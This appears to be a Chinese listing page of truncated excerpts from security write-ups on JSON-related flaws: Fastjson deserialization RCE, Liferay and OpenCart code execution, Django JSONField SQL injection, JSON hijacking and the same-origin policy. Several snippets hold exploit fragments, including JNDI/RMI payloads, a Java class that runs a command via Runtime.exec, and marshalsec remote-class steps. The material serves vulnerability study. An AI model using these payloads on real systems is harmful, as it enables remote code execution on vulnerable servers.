影响范围:Fastjson<=1.2.62需要开启autotypepoc:String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";pom: <dependency><groupId>com.alibaba</groupId><artifactId>fastjson</artifactId><version>1.2.62</version></dependency><dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <v...
作者:Longofo@知道创宇404实验室 时间:2020年3月27日 原文地址:https://paper.seebug.org/1162/英文版本:https://paper.seebug.org/1163/之前在CODE WHITE上发布了一篇关于Liferay Portal JSON Web Service RCE的漏洞,之前是小伙伴在处理这个漏洞,后面自己也去看了。Liferay Portal对于JSON Web Service的处理,在6.1、6.2版本中使用的是 Flexjson库,在7版本之后换成了Jodd Json。总结起来该漏洞就是:Liferay Portal提供了...
0x01 漏洞背景fastjson<= 1.2.660x02 漏洞复现poc:POST /FastjsonWeb_war/openAutoType HTTP/1.1 Host: 192.168.52.136:8088 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type:application/json Accept-Encoding: gzip, deflate Connection: close Upgrade-Insec...
重要漏洞利用poc及版本我是从github上的参考中直接copy的exp,这个类就是要注入的类import java.lang.Runtime; import java.lang.Process;public class Exploit {public Exploit() {try{// 要执行的命令String commands = "calc.exe";Process pc = Runtime.getRuntime().exec(commands);pc.waitFor();} catch(Exception e){e.printStackTrace();}}public static void main(String[] argv) {Exploit e = new Exploit();}} 网上经常分...
2016-04-12 14:12:56 来源:360安全播报 作者:暗羽喵 阅读:103次 分享到: 最近,安全研究人员Naser Farhadi(Twitter: @naserfarhadi)发现OpenCart json_decode函数中存在远程PHP代码执行漏洞,涉及到的版本有2.1.0.2 到 2.2.0.0 (最新版本) 漏洞存在于 /upload/system/helper/json.php中,其中有这段代码 # /upload/system/helper/json.php$match = /".*?(? 其中通过json进行了函数的创建,而json_decode函数...
本篇文章给大家带来的内容是介绍如何保护数据并防止JSON漏洞和劫持,有一定的参考价值,有需要的朋友可以参考一下,希望对你们有所帮助。JSON其实并不像我们认为的那样完全安全,黑客可以通过JSON数组中的跨站点请求伪造(CSRF)从不知情的用户那里获取敏感的用户数据。这主要是公开包含JSON数组、敏感数据、响应GET请求、启用JavaScript的请求、支持_u defineSetter_方法的请求的JSON服务。那么如何防止JSON漏洞,防止JSON劫持,即...
0x01简介 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。 什么是JSONField,Django是一个大而全的Web框架,其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 相比于Mysql,Postgresql支持的数据类型更加丰富,其对JSON格式数据的支持也让这个关系型数据库拥有了NoSQL的一些特点...
Django JSONField SQL注入漏洞复现 (CVE-2019-14234) 漏洞概述: Django通常搭配postgresql数据库,而JSONField是该数据库的一种数据类型。该漏洞的出现的原因在于Django中JSONField类的实现,Django的model最本质的作用是生成SQL语句,而在Django通过JSONField生成sql语句时,是通过简单的字符串拼接。 通过JSONField类获得KeyTransform类并生成sql语句的位置。 其中key_name是可控的字符串,最终生成的语句是WHERE (field->’[...
fastjson反序列化的一些前置知识 我们都知道fastjson触发漏洞的点在setter或者getter,以及fastjson反序列化存在parse和parseObject两个方法,在我最开始了解fastjson反序列化时看到一篇文章给出了一个说法: "parse只触发setter,parseObject同时触发getter和setter" 真的是这样吗?我测试了一下就发现这个说法是笼统并且有问题的,parseObject(String text, Class clazz)在这个例子里就只触发了setter在先知看到了一个总结 https:...
同源策略介绍 什么是同源策略? 同源策略是一种约定,它是浏览器最核心的也是最基本的安全功能,如果缺少了同源策略,则浏览器的正常功能可能会受影响。可以说Web是构建在同源策略基础之上的,浏览器只是针对同源策略的一种实现。 同源策略,它是由Netscape提出的一个著名的安全策略。 当一个浏览器的两个tab页中分别打开来百度和谷歌的页面。 当浏览器的百度tab页执行一个脚本的时候会检查这个脚本是属于哪个页面的。 即检查是否同...
1.2.24-rce 1.post发送一个JSON对象,即可更新服务端的信息:curl http://192.168.0.108:8090/ -H "Content-Type: application/json" --data '{"name":"hello", "age":20}' 2.借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class: javac TouchFile.java #编译生成class文件 python -m SimpleHTTPServer 80 git clone https://github.com/mbechler/marshalsec.git cd marshalsec mvn c...